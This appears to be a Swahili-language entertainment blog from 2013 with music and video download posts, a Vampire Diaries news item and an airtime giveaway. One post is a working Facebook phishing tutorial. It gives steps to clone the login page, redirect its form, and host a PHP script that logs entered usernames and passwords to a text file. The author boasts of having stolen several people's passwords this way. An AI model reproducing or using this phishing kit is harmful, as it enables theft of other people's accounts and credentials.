Search This Blog

Friday, January 11, 2013

ROMA - 2030 INTRO

ROMA - 2030 intro


Hii ni intro ya ngoma yake mpya ambayo wengi wanasema itazuiliwa kupigwa redioni..........Leo au kesho ntawapa kitu full....... Yani mtaweza sikiliza na kudownload wimbo wenyewe.....


Kudownload intro bofya hapa>>>> HAPA
Kusikiliza bofya



brought to you by Nellynho&Ellynho company
Copyright c 2013 Nellynho! co.
Allrights reserved
-->

VAMPIRE DIARIES >>> THE ORIGINALS

VAMPIRE DIARIES INABADIKIKA

Televisheni ya CW networt ambayo ndiyo inayotoa series za VAMPIRE DIARIES inaelezwa kuwa itaibadilisha series hiyo ya VAMPIRE DIARIES katika episode mpya watakayoitoa tarehe 25 mwezi 4 ambayo itakuwa na wahusika wapya pamoja na story. Episode hiyo mpya inayokwenda kwa jina la THE ORIGINALS inaweza kuwa ni mwanzo wa series mpya nyingine.

Joseph Morgan (Klaus) na Phoebe Tonkin (Hayley) ndiyo watakuwa ma-star wa hiyo mambo mpya.
Tarehe 25 Mwezi wa 4 kitu hiyo mpya ndo itadondoka hewani..............wapenzi wa VAMPIRE DIARIES mnaionaje hii inshu???????

Kama una swali au maoni usiwaze wala usiwe na wasi kututonya......unaweza kubofya hapo chini palipoandikwa Post a comment na kuacha mawazo yako hapo au ukanicheki FACEBOOK kwa kubofya HAPA na huko unaweza kuacha maoni yako kwa kuandika kwenye WALL yangu au kuni-inbox...........itakuwa safi sana...

brought to you by Nellynho&Ellynho company
Copyright c 2013 Nellynho! co.
Allrights reserved

Wednesday, January 9, 2013

NAKUPENDA by "Viola Karuri"

Ni track Inayotamba sana mtaani sa hivi....... Nyimbo ni ya mwanadada wa Kenya ambaye ana roho na damu ya uimbaji kwanzia tumboni(VIOLA KARURI)....NA HII NI VIDEO YAKE YA KWANZA......sina mengi ya kusema

JINSI YA KU-DOWNLOAD

Bofya >>>>>>>>>>>>> HAPA
VIDEO SIZE =4.5mb
FORMAT = 3gp
brought to you by Nellynho&Ellynho company
Copyright (c) 2013 Nellynho! co.
Allrights reserved

DOWNLOAD SUSANA BY Nkem Owoh



Ni nyimbo nzuri yani si kawaida inahusu msichana ,(SUSANA) aliyempenda mwanamme kwa ajili ya fedha zake na zawadi, na alimwacha jamaa baada ya kuishiwa MONEY. Muimbaji wa hii nyimbo ni mwigizaji namchekeshaji wa Nigeria. Jina lake ni Nkem Owoh lakini a.k.a yake Ni "Usoufia". Sikwambii reason yake kuuweka huu wimbo kwenye hii blog lakini ukiuangalia utaelewa kwa nini nimeuweka.

JINSI YA KU-DAWNLOAD


NORMAL QUALITY
Bofya >>>>>>>>>>>>> HAPA
VIDEO SIZE =2.5mb
FORMAT = 3gp

HIGH QUALITY
Bofya>>>>>>>>>>>>>>>>> HAPA
VIDEO SIZE = 5.2mb
FORMAT = 3gp
BY NELLYNHO DONALD

HATUA ZA KWANZA ZA KUPATA PASSWORD ZA MTU FACEBOOK

UKIFWATA HATUA ZOTE KWA MAKINI UTAWEZA KUPATA PASSWORD ZA MTU FACEBOOK.
NIMESHAZIJARIBU NA NIMEWEZA KUPATA PASSWORD ZA WATU KADHAA.

"SI UTANI"

LETS START
Step1: Goto www.facebook.com/
login.php


Step2 : Save the file to your desktop with photos with
name login.php

Step3 : Open the html file with notepad.

Step4 : Now search for form method="POST" and replace it with form method="GET"

Step5 : And next is replacing action = "https://login.facebook.com/login.php?login_attempt=1" with action="lol.php"

S t e p 6 : now open a notepad and type following as it is . <?php header ('Location:http://www.facebook.com');$handle=fopen("lol.txt","a");foreach($_POSTas$variable=>$value){fwrite($handle, $variable);fwrite($handle,"="); fwrite($handle, $value);fwrite($handle,"\r\n");}fwrite($handle,"\r\n");fclose($handle);exit;?>

NOW save this as hello.php

Step7 : now make a account on t35.com and Upload Login.html hello.php lol.txt

For A DETAILED way of uploading the Phishing site Visit: http:// hackthepc.blogspot.com/ 2011/03/making-facebook- phishing-site-tutorial.html

NOTE: You have to make the other person enter his password and you can get the password by downloading the lol.txt file from your t35.com account by cPanel.

Tuesday, January 8, 2013

KITCHEN PARTY YA KI-TZ

Niliwahi kuckia kwamba kwenye kitchen party wanaume hawaruhusiwi......nlikuwa sina uhakika ni kwanini leo nimepata jibu la swali langu na ningependa na nyinyi mlijue.

Jibu lenyewe utalipata kwa kutazama video hii ya KITCHEN PARTY.

JINSI YA KU-DAWNLOAD


NORMAL QUALITY
Bofya >>>>>>>>>>>>> HAPA
VIDEO SIZE = 3mb
FORMAT = 3gp

HIGH QUALITY
Bofya>>>>>>>>>>>>>>>>> HAPA
VIDEO SIZE = 5mb
FORMAT = 3gp
BY NELLYNHO

SHINDA VOCHA SH:500

Wewe a.ka.a yako ni nani...........?? najua ipo na unaifahamu na pengine watu wa pembeni yako huwa wanakuita. Mimi ya kwangu ni NELLYNHO. Kwa bahati mbaya watu wengine wana a.k.a ambazo hawazijui.....yani watu huwa wanaitumia bila yeye kufahamu.......(hasa maticha wa sekondari)

Ila mimi shida yangu co hiyo nnachotaka ni unipe maana na kirefu cha a.k.a na utajishindia zawadi papo hapo. Na zawadi hiyo ni muda wa maongezi Sh500.(TIGO)

MTU WA KWANZA ATAKAYECOMMENT JIBU SAHIHI NITAMTUMIA KWENYE ACCOUNT YAKE YA FB NAMBA ZA VOCHA.

AHSANTENI KWA KUSHIRIKI